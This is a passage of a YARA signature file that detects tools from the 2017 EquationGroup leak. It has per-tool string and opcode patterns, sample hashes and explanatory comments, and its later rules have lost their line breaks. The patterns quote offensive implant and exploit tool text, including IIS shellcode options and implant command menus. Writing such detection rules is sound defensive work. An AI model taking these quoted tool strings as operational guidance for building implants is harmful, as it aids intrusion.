      ( uint16(0) == 0x5a4d and filesize < 40KB and all of them )
}

// Windows 9x banner implant. $s1 is the same MSVC RTTI type-descriptor name
// used by the AdUser implant rule; $op1 (c9 c3 = leave; ret, then push edi and
// an lea from a large ebp-relative frame) narrows it. Both required, < 20KB.
rule EquationGroup_Toolset_Apr17_Banner_Implant9x {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "5d69a8cfc9b636448f023fcf18d111f13a8e6bcb9a693eb96276e0d796ab4e0c"
   strings:
      $s1 = ".?AVFeFinallyFailure@@" fullword ascii
      $op1 = { c9 c3 57 8d 85 2c eb ff ff }
   condition:
      ( uint16(0) == 0x5a4d and filesize < 20KB and all of them )
}

// GREATERDOCTOR dllConfig helper. $x1/$x2 are build-path / PDB-path fragments
// and deliberately lack "fullword" so they match as substrings of the full
// embedded path; any one of the four strings is enough.
rule EquationGroup_Toolset_Apr17_greatdoc_dll_config {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "fd9d0abfa727784dd07562656967d220286fc0d63bcf7e2c35d4c02bc2e5fc2e"
   strings:
      $x1 = "C:\\Projects\\GREATERDOCTOR\\trunk\\GREATERDOCTOR" ascii
      $x2 = "src\\build\\Release\\dllConfig\\dllConfig.pdb" ascii
      $x3 = "GREATERDOCTOR [ commandline args configuration ]" fullword ascii
      $x4 = "-useage: <scanner> \"<cmdline args>\"" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them )
}

// Network scanner utility (per its own banner text).
rule EquationGroup_Toolset_Apr17_scanner {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author =
"Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "f180bdb247687ea9f1b58aded225d5c80a13327422cd1e0515ea891166372c53"
   strings:
      // Looks like an NTP control-query variable list (daemon_version, system,
      // processor, refid, clock) — the most specific of the five strings.
      $x1 = "+daemon_version,system,processor,refid,clock" fullword ascii
      $x2 = "Usage: %s typeofscan IP_address" fullword ascii
      $x3 = "# scanning ip %d.%d.%d.%d" fullword ascii
      $x4 = "Welcome to the network scanning tool" fullword ascii
      $x5 = "***** %s ***** (length %d)" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 90KB and 1 of them )
}

// Mcl NtMemory module. Opcode-only: each fragment is a run of
// "c6 44 24 <disp8> <imm8>" = mov byte ptr [esp+disp8], imm8, i.e. a string
// being assembled on the stack one character at a time (the immediates are
// the characters: 'P','r' / 'o','w' / 'e','s','s'). All three required.
rule EquationGroup_Toolset_Apr17_Mcl_NtMemory_Std {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "087db4f2dbf8e0679de421fec8fb2e6dd50625112eb232e4acc1408cc0bcd2d7"
   strings:
      $op1 = { 44 24 37 50 c6 44 24 38 72 c6 44 }
      $op2 = { 44 24 33 6f c6 44 24 34 77 c6 }
      $op3 = { 3b 65 c6 44 24 3c 73 c6 44 24 3d 73 c6 44 24 3e }
   condition:
      ( uint16(0) == 0x5a4d and filesize < 300KB and all of them )
}

// "tacothief"; a single size-limit message (655360 = 640KB) carries the rule.
rule EquationGroup_Toolset_Apr17_tacothief {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "c71953cc84c27dc61df8f6f452c870a7880a204e9e21d9fd006a5c023b052b35"
   strings:
      $x1 = "File too large! Must be less than 655360 bytes."
fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 100KB and all of them )
}

// "ntevt" (64-bit, per the REX-prefixed opcodes). $op1 decodes to a run of
// pops (r10, r9, r8, rdi, rsi, rbp, rdx, rcx, rbx, rax) followed by
// "add rsp, imm8" — a register-restoring epilogue.
// Condition precedence: "and" binds tighter than "or", so this reads as
// (MZ and size and $x1) or (3 of them); the "3 of them" branch fires in any
// file without the MZ/size guard. That is consistent with how the other
// rules in this set use "or N of them", but note the PDB path alone is the
// only branch that is actually gated by the header check.
rule EquationGroup_Toolset_Apr17_ntevt {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "4254ee5e688fc09bdc72bcc9c51b1524a2bb25a9fb841feaf03bc7ec1a9975bf"
   strings:
      $x1 = "c:\\ntevt.pdb" fullword ascii
      $s1 = "ARASPVU" fullword ascii
      $op1 = { 41 5a 41 59 41 58 5f 5e 5d 5a 59 5b 58 48 83 c4 }
      $op2 = { f9 48 03 fa 48 33 c0 8a 01 49 03 c1 49 f7 e0 88 }
      $op3 = { 01 41 f6 e0 49 03 c1 88 01 48 33 }
   condition:
      ( uint16(0) == 0x5a4d and filesize < 700KB and $x1 or 3 of them )
}

// Process-listing target module. $s1 and $s3 are ordinary WMI strings that
// many legitimate administration tools also contain, and "2 of them" is
// satisfied by those two alone, so expect false positives on benign WMI
// clients; $s5 (which looks like a scanf format for a CIM_DATETIME value)
// is the distinguishing string when triaging a hit.
rule EquationGroup_Toolset_Apr17_Processes_Target {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "69cf7643dbecc5f9b4b29edfda6c0295bc782f0e438f19be8338426f30b4cc74"
   strings:
      $s1 = "Select * from Win32_Process" fullword ascii
      $s3 = "\\\\%ls\\root\\cimv2" fullword wide
      $s5 = "%4ls%2ls%2ls%2ls%2ls%2ls.%11l[0-9]%1l[+-]%6s" fullword wide
   condition:
      ( uint16(0) == 0x5a4d and filesize < 200KB and 2 of them )
}

// "st_lp" listening-post / operator console (per its menu text). Note the
// trailing space inside $x3 is part of the prompt and of the signature.
rule EquationGroup_Toolset_Apr17_st_lp {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "3b6f756cca096548dcad2b6c241c1dafd16806c060bec82a530f4d38755286a2"
   strings:
      $x1 = "Previous command: set injection processes (status=0x%x)" fullword ascii
      $x2 = "Secondary injection process is <null> [no secondary process will be used]" fullword ascii
      $x3 = "Enter the address to be used as the spoofed IP source address (xxx.xxx.xxx.xxx) -> " fullword ascii
      $x4 = "E: Execute a Command on the Implant" fullword ascii
   condition:
      ( uint16(0) == 0x5a4d and filesize < 300KB and 1 of
them )
}

// Java tool shipped as a JAR: 0x4b50 is the ZIP magic "PK" read little-endian,
// and the three strings are zip entry names of the contained classes.
rule EquationGroup_Toolset_Apr17_FullThreadDump {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "b68f3f32bfa6cf11145c9fb9bf0075a5ca3938ea218b1cc29ad62f7b9e043255"
   strings:
      $s1 = "FullThreadDump.class" fullword ascii
      $s2 = "ThreadMonitor.class" fullword ascii
      $s3 = "Deadlock$DeadlockThread.class" fullword ascii
   condition:
      ( uint16(0) == 0x4b50 and filesize < 30KB and all of them )
}

// EpWrapper DLL loader; all strings are UTF-16 ("wide"). $s5 is the usage
// line and documents the tool's argument order.
rule EquationGroup_Toolset_Apr17_EpWrapper {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "a8eed17665ee22198670e22458eb8c9028ff77130788f24f44986cce6cebff8d"
   strings:
      $x1 = "* Failed to get remote TCP socket address" fullword wide
      $x2 = "* Failed to get 'LPStart' export" fullword wide
      $s5 = "Usage: %ls <logdir> <dll_search_path> <dll_to_load_path> <socket>" fullword wide
   condition:
      ( uint16(0) == 0x5a4d and filesize < 20KB and 1 of them )
}

// DiBa target module for Windows 2000. $s1 looks like relocation/fixup
// residue rather than a meaningful string. The $op fragments are runs of
// "c6 45 <disp8> <imm8>" = mov byte ptr [ebp+disp8], imm8, i.e. a string
// assembled on the stack; the immediates spell fragments such as "el32",
// which is consistent with an API or module name being built, though the
// full string is not visible here. Three of the four patterns are required.
rule EquationGroup_Toolset_Apr17_DiBa_Target_2000 {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "f9ea8ff5985b94f635d03f3aab9ad4fb4e8c2ad931137dba4f8ee8a809421b91"
   strings:
      $s1 = "0M1U1Z1p1" fullword ascii
      $op1 = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 }
      $op2 = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 }
      $op3 = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f }
   condition:
      ( uint16(0) == 0x5a4d and filesize < 1000KB and 3 of them )
}

// DllLoad target module; stack-string opcode fragments plus one odd literal.
rule EquationGroup_Toolset_Apr17_DllLoad_Target {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
hash1 = "a42d5201af655e43cefef30d7511697e6faa2469dc4a74bc10aa060b522a1cf5" strings: $s1 = "BzWKJD+" fullword ascii $op1 = { 44 24 6c 6c 88 5c 24 6d } $op2 = { 44 24 54 63 c6 44 24 55 74 c6 44 24 56 69 } $op3 = { 44 24 5c 6c c6 44 24 5d 65 c6 44 24 5e } condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of them ) } rule EquationGroup_Toolset_Apr17_EXPA { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "2017176d3b5731a188eca1b71c50fb938c19d6260c9ff58c7c9534e317d315f8" strings: $x1 = "* The target is IIS 6.0 but is not running content indexing servicess," fullword ascii $x2 = "--ver 6 --sp <service_pack> --lang <language> --attack shellcode_option[s]sL" fullword ascii $x3 = "By default, the shellcode will attempt to immediately connect s$" fullword ascii $x4 = "UNEXPECTED SHELLCODE CONFIGURATION ERRORs" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 12000KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_RemoteExecute_Target { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "4a649ca8da7b5499821a768c650a397216cdc95d826862bf30fcc4725ce8587f" strings: $s1 = "Win32_Process" fullword ascii $s2 = "\\\\%ls\\root\\cimv2" fullword wide $op1 = { 83 7b 18 01 75 12 83 63 } condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of them ) } rule EquationGroup_Toolset_Apr17_DS_ParseLogs { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "0228691d63038b072cdbf50782990d505507757efbfa87655bb2182cf6375956" strings: $x1 = "* Size (%d) of remaining capture file is too small to contain a valid header" 
fullword wide $x2 = "* Capture header not found at start of buffer" fullword wide $x3 = "Usage: %ws <capture_file> <results_prefix>" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 100KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Oracle_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "8e9be4960c62ed7f210ce08f291e410ce0929cd3a86fe70315d7222e3df4587e" strings: $op0 = { fe ff ff ff 48 89 9c 24 80 21 00 00 48 89 ac 24 } $op1 = { e9 34 11 00 00 b8 3e 01 00 00 e9 2a 11 00 00 b8 } $op2 = { 48 8b ca e8 bf 84 00 00 4c 8b e0 8d 34 00 44 8d } condition: ( uint16(0) == 0x5a4d and filesize < 500KB and all of them ) } rule EquationGroup_Toolset_Apr17_DmGz_Target { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "5964966041f93d5d0fb63ce4a85cf9f7a73845065e10519b0947d4a065fdbdf2" strings: $s1 = "\\\\.\\%ls" fullword ascii $s3 = "6\"6<6C6H6M6Z6f6t6" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 80KB and all of them ) } rule EquationGroup_Toolset_Apr17_SetResourceName { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "537793d5158aecd0debae25416450bd885725adfc8ca53b0577a3df4b0222e2e" strings: $x1 = "Updates the name of the dll or executable in the resource file" fullword ascii $x2 = "*NOTE: SetResourceName does not work with PeddleCheap versions" fullword ascii $x3 = "2 = [appinit.dll] level4 dll" fullword ascii $x4 = "1 = [spcss32.exe] level3 exe" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_drivers_Implant { meta: 
description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "ee8b048f1c6ba821d92c15d614c2d937c32aeda7b7ea0943fd4f640b57b1c1ab" strings: $s1 = ".?AVFeFinallyFailure@@" fullword ascii $s2 = "hZwLoadDriver" fullword ascii $op1 = { b0 01 e8 58 04 00 00 c3 33 } condition: ( uint16(0) == 0x5a4d and filesize < 30KB and all of them ) } rule EquationGroup_Toolset_Apr17_Shares_Target { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "6c57fb33c5e7d2dee415ae6168c9c3e0decca41ffe023ff13056ff37609235cb" strings: $s1 = "Select * from Win32_Share" fullword ascii $s2 = "slocalhost" fullword wide $s3 = "\\\\%ls\\root\\cimv2" fullword wide $s4 = "\\\\%ls\\%ls" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of them ) } rule EquationGroup_Toolset_Apr17_DUMPEL { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "bf42532be2d36f522dca7d3d3eb40b1d25c33d508a5a37c7e28f148945136dc6" strings: $x1 = "dumpel -f file [-s \\\\server]" fullword ascii $x2 = "records will not appear in the dumped log." 
fullword ascii $x3 = "obj\\i386\\Dumpel.exe" fullword ascii $s13 = "DUMPEL Usage: " fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_ntfltmgr { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "3df61b8ef42a995b8f15a0d38bc51f2f08f8d9a2afa1afc94c6f80671cf4a124" hash2 = "f7a886ee10ee6f9c6be48c20f370514be62a3fd2da828b0dff44ff3d485ff5c5" hash3 = "980954a2440122da5840b31af7e032e8a25b0ce43e071ceb023cca21cedb2c43" strings: $s3 = "wCw3wDwAw2wNw@wEwZw2wDwEwBwZwFwFw4w2wZw5w1w4wFwZwGwOwGwGwEw5w2wFwGwDwFwOw" fullword ascii $s6 = "w+w;w2w0w6w4w.w(wRw" fullword ascii $op1 = { 80 f7 ff ff 49 89 84 34 18 02 00 00 41 83 a4 34 } $op2 = { ff 15 0b 34 00 00 eb 92 } $op3 = { 4d 8d b4 34 08 02 00 00 4d 85 f6 0f 84 ae } $op4 = { 8b ca 2b ce 8d 34 01 0f b7 3e 66 3b 7d f0 89 75 } $op5 = { 8a 40 01 00 c7 47 70 } $op6 = { e9 3c ff ff ff 6a ff 8d 45 f0 50 e8 27 11 00 00 } $op7 = { 8b 45 08 53 57 8b 7d 0c c7 40 34 } condition: ( uint16(0) == 0x5a4d and filesize < 100KB and 4 of them ) } rule EquationGroup_Toolset_Apr17_DiBa_Target_BH { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "7ae9a247b60dc31f424e8a7a3b3f1749ba792ff1f4ba67ac65336220021fce9f" strings: $op0 = { 44 89 20 e9 40 ff ff ff 8b c2 48 8b 5c 24 60 48 } $op1 = { 45 33 c9 49 8d 7f 2c 41 ba } $op2 = { 89 44 24 34 eb 17 4c 8d 44 24 28 8b 54 24 30 48 } condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and all of them ) } rule EquationGroup_Toolset_Apr17_PC_LP { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = 
"3a505c39acd48a258f4ab7902629e5e2efa8a2120a4148511fe3256c37967296" strings: $s1 = "* Failed to get connection information. Aborting launcher!" fullword wide $s2 = "Format: <command> <target port> [lp port]" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of them ) } rule EquationGroup_Toolset_Apr17_RemoteCommand_Lp { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "57b47613a3b5dd820dae59fc6dc2b76656bd578f015f367675219eb842098846" strings: $s1 = "Failure parsing command from %hs:%u: os=%u plugin=%u" fullword wide $s2 = "Unable to get TCP listen port: %08x" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of them ) } rule EquationGroup_Toolset_Apr17_lp_mstcp { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "2ab1e1d23021d887759750a0c053522e9149b7445f840936bbc7e703f8700abd" strings: $s1 = "\\Registry\\User\\CurrentUser\\" fullword wide $s2 = "_PacketNDISRequestComplete@12\"" fullword ascii $s3 = "_LDNdis5RegDeleteKeys@4" fullword ascii $op1 = { 89 7e 04 75 06 66 21 46 02 eb } $op2 = { fc 74 1b 8b 49 04 0f b7 d3 66 83 } $op3 = { aa 0f b7 45 fc 8b 52 04 8d 4e } condition: ( uint16(0) == 0x5a4d and filesize < 100KB and ( all of ($s*) or all of ($op*) ) ) } rule EquationGroup_Toolset_Apr17_renamer { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "9c30331cb00ae8f417569e9eb2c645ebbb36511d2d1531bb8d06b83781dfe3ac" strings: $s1 = "FILE_NAME_CONVERSION.LOG" fullword wide $s2 = "Log file exists. You must delete it!!!" 
fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 80KB and all of them ) } rule EquationGroup_Toolset_Apr17_PC_Exploit { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "77486bb828dba77099785feda0ca1d4f33ad0d39b672190079c508b3feb21fb0" strings: $s1 = "\\\\.\\pipe\\pcheap_reuse" fullword wide $s2 = "**** FAILED TO DUPLICATE SOCKET ****" fullword wide $s3 = "**** UNABLE TO DUPLICATE SOCKET TYPE %u ****" fullword wide $s4 = "YOU CAN IGNORE ANY 'ServiceEntry returned error' messages after this..." fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 20KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_PC_Level3_Gen { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "c7dd49b98f399072c2619758455e8b11c6ee4694bb46b2b423fa89f39b185a97" hash2 = "f6b723ef985dfc23202870f56452581a08ecbce85daf8dc7db4491adaa4f6e8f" strings: $s1 = "S-%u-%u" fullword ascii $s2 = "Copyright (C) Microsoft" fullword wide $op1 = { 24 39 65 c6 44 24 3a 6c c6 44 24 3b 65 c6 44 24 } $op2 = { 44 24 4e 41 88 5c 24 4f ff } $op3 = { 44 24 3f 6e c6 44 24 40 45 c6 44 24 41 } condition: ( uint16(0) == 0x5a4d and filesize < 400KB and 3 of them ) } rule EquationGroup_Toolset_Apr17_put_Implant9x { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "8fcc98d63504bbacdeba0c1e8df82f7c4182febdf9b08c578d1195b72d7e3d5f" strings: $s1 = "3&3.3<3A3F3K3V3c3m3" fullword ascii $op1 = { c9 c2 08 00 b8 72 1c 00 68 e8 c9 fb ff ff 51 56 } $op2 = { 40 1b c9 23 c8 03 c8 38 5d 14 74 05 6a 03 58 eb } condition: ( uint16(0) == 0x5a4d and filesize < 20KB and 2 of them ) 
} rule EquationGroup_Toolset_Apr17_promiscdetect_safe { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "6070d8199061870387bb7796fb8ccccc4d6bafed6718cbc3a02a60c6dc1af847" strings: $s1 = "running on this computer!" fullword ascii $s2 = "- Promiscuous (capture all packets on the network)" fullword ascii $s3 = "Active filter for the adapter:" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 80KB and all of them ) } rule EquationGroup_Toolset_Apr17_PacketScan_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "9b97cac66d73a9d268a15e47f84b3968b1f7d3d6b68302775d27b99a56fbb75a" strings: $op0 = { e9 ef fe ff ff ff b5 c0 ef ff ff 8d 85 c8 ef ff } $op1 = { c9 c2 04 00 b8 34 26 00 68 e8 40 05 00 00 51 56 } $op2 = { e9 0b ff ff ff 8b 45 10 8d 4d c0 89 58 08 c6 45 } condition: ( uint16(0) == 0x5a4d and filesize < 30KB and all of them ) } rule EquationGroup_Toolset_Apr17_SetPorts { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "722d3cf03908629bc947c4cca7ce3d6b80590a04616f9df8f05c02de2d482fb2" strings: $s1 = "USAGE: SetPorts <input file> <output file> <version> <port1> [port2] [port3] [port4] [port5]" fullword ascii $s2 = "Valid versions are: 1 = PC 1.2 2 = PC 1.2 (24 hour)" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and all of them ) } rule EquationGroup_Toolset_Apr17_GrDo_FileScanner_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" 
hash1 = "8d2e43567e1360714c4271b75c21a940f6b26a789aa0fce30c6478ae4ac587e4" strings: $s1 = "system32\\winsrv.dll" fullword wide $s2 = "raw_open CreateFile error" fullword ascii $s3 = "\\dllcache\\" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 400KB and all of them ) } rule EquationGroup_Toolset_Apr17_msgks_mskgu { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "7b4986aee8f5c4dca255431902907b36408f528f6c0f7d7fa21f079fa0a42e09" hash2 = "ef906b8a8ad9dca7407e0a467b32d7f7cf32814210964be2bfb5b0e6d2ca1998" strings: $op1 = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 } $op2 = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 } $op3 = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f } condition: ( uint16(0) == 0x5a4d and filesize < 300KB and all of them ) } rule EquationGroup_Toolset_Apr17_Ifconfig_Target { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "1ebfc0ce7139db43ddacf4a9af2cb83a407d3d1221931d359ee40588cfd0d02b" strings: $s1 = "SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\%hs" fullword wide $op1 = { 0f be 37 85 f6 0f 85 4e ff ff ff 45 85 ed 74 21 } $op2 = { 4c 8d 44 24 34 48 8d 57 08 41 8d 49 07 e8 a6 4b } condition: ( uint16(0) == 0x5a4d and filesize < 100KB and all of them ) } rule EquationGroup_Toolset_Apr17_DiBa_Target { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "ffff3526ed0d550108e97284523566392af8523bbddb5f212df12ef61eaad3e6" strings: $op1 = { 41 5a 41 59 41 58 5f 5e 5d 5a 59 5b 58 48 83 c4 } $op2 = { f9 48 03 fa 48 33 c0 8a 01 49 03 c1 49 f7 e0 88 } $op3 = { 01 
41 f6 e0 49 03 c1 88 01 48 33 } condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and all of them ) } rule EquationGroup_Toolset_Apr17_Dsz_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "fbe103fac45abe4e3638055a3cac5e7009166f626cf2d3049fb46f3b53c1057f" hash2 = "ad1dddd11b664b7c3ad6108178a8dade0a6d9795358c4a7cedbe789c62016670" strings: $s1 = "%02u:%02u:%02u.%03u-%4u: " fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 1000KB and all of them ) } rule EquationGroup_Toolset_Apr17_GenKey { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "b6f100b21da4f7e3927b03b8b5f0c595703b769d5698c835972ca0c81699ff71" strings: $x1 = "* PrivateEncrypt -> PublicDecrypt FAILED" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 80KB and all of them ) } rule EquationGroup_Toolset_Apr17_wmi_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "de08d6c382faaae2b4b41b448b26d82d04a8f25375c712c12013cb0fac3bc704" strings: $x1 = "SELECT ProcessId,Description,ExecutablePath FROM Win32_Process" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 50KB and all of them ) } rule EquationGroup_Toolset_Apr17_clocksvc { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "c1bcd04b41c6b574a5c9367b777efc8b95fe6cc4e526978b7e8e09214337fac1" strings: $x1 = "~debl00l.tmp" fullword ascii $x2 = "\\\\.\\mailslot\\c54321" fullword ascii $x3 = 
"\\\\.\\mailslot\\c12345" fullword ascii $x4 = "nowMutex" fullword ascii $s1 = "System\\CurrentControlSet\\Services\\MSExchangeIS\\ParametersPrivate" fullword ascii $s2 = "000000005017C31B7C7BCF97EC86019F5026BE85FD1FB192F6F4237B78DB12E7DFFB07748BFF6432B3870681D54BEF44077487044681FB94D17ED04217145B98" ascii $s3 = "00000000E2C9ADBD8F470C7320D28000353813757F58860E90207F8874D2EB49851D3D3115A210DA6475CCFC111DCC05E4910E50071975F61972DCE345E89D88" ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and ( 1 of ($x*) or 2 of ($s*) ) ) } rule EquationGroup_Toolset_Apr17_xxxRIDEAREA { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "214b0de83b04afdd6ad05567825b69663121eda9e804daff9f2da5554ade77c6" strings: $x1 = "USAGE: %s -i InputFile -o OutputFile [-f FunctionOrdinal] [-a FunctionArgument] [-t ThreadOption]" fullword ascii $x2 = "The output payload \"%s\" has a size of %d-bytes." 
